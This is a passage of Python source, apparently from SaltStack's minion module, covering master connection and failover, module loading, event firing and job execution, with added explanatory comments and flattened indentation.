if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
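
# Editor's illustrative examples (not part of the upstream module): the
# rsplit(':', 1) behavior that prep_ip_port relies on.
#
#   'mysaltmaster'.rsplit(':', 1)    -> ['mysaltmaster']
#   '127.0.0.1:1234'.rsplit(':', 1)  -> ['127.0.0.1', '1234']
#   '::1:1234'.rsplit(':', 1)        -> ['::1', '1234']
#
# Note that a bare IPv6 address without a port (e.g. '::1') would also be
# split on its last colon, which is one reason the 'ip_only'
# master_uri_format option is useful.
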
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
    mode: which is anything os.makedirs would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
                # Don't append the version that was just derived from
                # parse_input above; that would result in a second call to
                # salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
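
# Editor's illustrative sketch (not part of the upstream module): the two
# argument shapes load_args_and_kwargs distinguishes. A plain value is a
# positional arg, while a dict carrying '__kwarg__': True is unpacked into
# kwargs. The sample data is hypothetical.
def _demo_arg_shapes():
    args = [
        'positional-value',
        {'__kwarg__': True, 'refresh': True},
    ]
    _args = [a for a in args
             if not (isinstance(a, dict) and a.get('__kwarg__') is True)]
    _kwargs = {}
    for a in args:
        if isinstance(a, dict) and a.pop('__kwarg__', False) is True:
            _kwargs.update(a)
    # _args == ['positional-value']; _kwargs == {'refresh': True}
    return _args, _kwargs
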
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minion's initialization
phase (for example from the minion's main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
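# Hypothetical minion config values for the three master_type modes
# described above (illustration only, not taken from a real deployment):
#
#     master_type: str        # default; 'master' is a single address
#     master: salt.example.com
#
#     master_type: func       # 'master' names a <module>.<function>
#     master: my_mod.get_master
#
#     master_type: failover   # 'master' must be a list of addresses
#     master:
#       - master1.example.com
#       - master2.example.com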
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# loop through a local copy of the master list (it may already have
# been shuffled above via master_shuffle)
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minion\'s connection attempt.')
log.error(msg)
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# If the minion uses a remote file client (or is configured to use the
# master when local), establish the master connection now
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
self.eval_master(self.opts, failed=True)
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts, self.functions, self.utils)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Check that for tcp ipc_mode that we have either default ports or
# lists of ports
if self.opts.get('ipc_mode') == 'tcp' and (
(not isinstance(self.opts['tcp_pub_port'], list) and
self.opts['tcp_pub_port'] != 4510) or
(not isinstance(self.opts['tcp_pull_port'], list) and
self.opts['tcp_pull_port'] != 4511)
):
raise SaltException('For multi-master, tcp_(pub/pull)_port '
'settings must be lists of ports, or the '
'default 4510 and 4511')
masternumber = 0
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
if self.opts.get('ipc_mode') == 'tcp':
# If one is a list, we can assume both are, because of check above
if isinstance(self.opts['tcp_pub_port'], list):
s_opts['tcp_pub_port'] = self.opts['tcp_pub_port'][masternumber]
s_opts['tcp_pull_port'] = self.opts['tcp_pull_port'][masternumber]
else:
s_opts['tcp_pub_port'] = self.opts['tcp_pub_port'] + (masternumber * 2)
s_opts['tcp_pull_port'] = self.opts['tcp_pull_port'] + (masternumber * 2)
self.io_loop.spawn_callback(self._connect_minion, s_opts)
masternumber += 1
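# Worked example of the tcp port assignment above, assuming the default
# ports 4510/4511 and three masters (masternumber = 0, 1, 2):
#
#     master 0: tcp_pub_port 4510, tcp_pull_port 4511
#     master 1: tcp_pub_port 4512, tcp_pull_port 4513
#     master 2: tcp_pub_port 4514, tcp_pull_port 4515
#
# With explicit lists, e.g. tcp_pub_port: [4510, 4600, 4700], each master
# simply takes the entry at its index instead.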
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop()
if not self.io_loop.initialized():
self.io_loop.install()
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
# TODO: remove?
def sync_connect_master(self):
'''
Block until we are connected to a master
'''
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minion's scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
}, persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1}); '
'both must be positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
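# Example of the randomization above (illustrative config values): with
# return_retry_timer: 5 and return_retry_timer_max: 10, randint(5, 10)
# picks a delay between 5 and 10 seconds inclusive, so not every minion
# retries its return at the same instant.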
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc()))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False, proxy=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
mem_info = psutil.Process(os.getpid()).memory_info()
mem_limit = mem_info.rss + mem_info.vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
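# Worked example of the cap computed above (illustrative numbers; the
# modules_max_memory option is a byte count): with rss + vms at ~380MB of
# current usage and modules_max_memory allowing another 512MB, RLIMIT_AS is
# set near 892MB for the module load, then restored from old_mem_limit at
# the end of this method.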
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
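# Minimal usage sketches for _fire_master() (tag and data values are
# illustrative only):
#
#     self._fire_master(data={'changed': True}, tag='custom/tag')
#     self._fire_master(events=beacons)   # forward a list of event dicts
#
# Either pass 'events', or pass a 'tag' (with optional 'data'); with
# neither, the method returns without sending anything, per the final else.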
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], (tuple, list)):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
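# Shape of the decoded 'data' payload handled above (hypothetical values,
# shown only to make the branching easier to follow):
#
#     {'fun': 'test.ping', 'arg': [], 'jid': '20150101000000000000',
#      'tgt': '*', 'tgt_type': 'glob', 'ret': '', 'user': 'root'}
#
# A compound command arrives with 'fun' and 'arg' as parallel lists, which
# is why _thread_multi_return is chosen for tuple/list 'fun' values.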
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if opts.get('sudo_user', ''):
sudo_runas = opts.get('sudo_user')
if 'sudo.salt_call' in minion_instance.functions:
return_data = minion_instance.functions['sudo.salt_call'](
sudo_runas,
data['fun'],
*args,
**kwargs)
else:
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
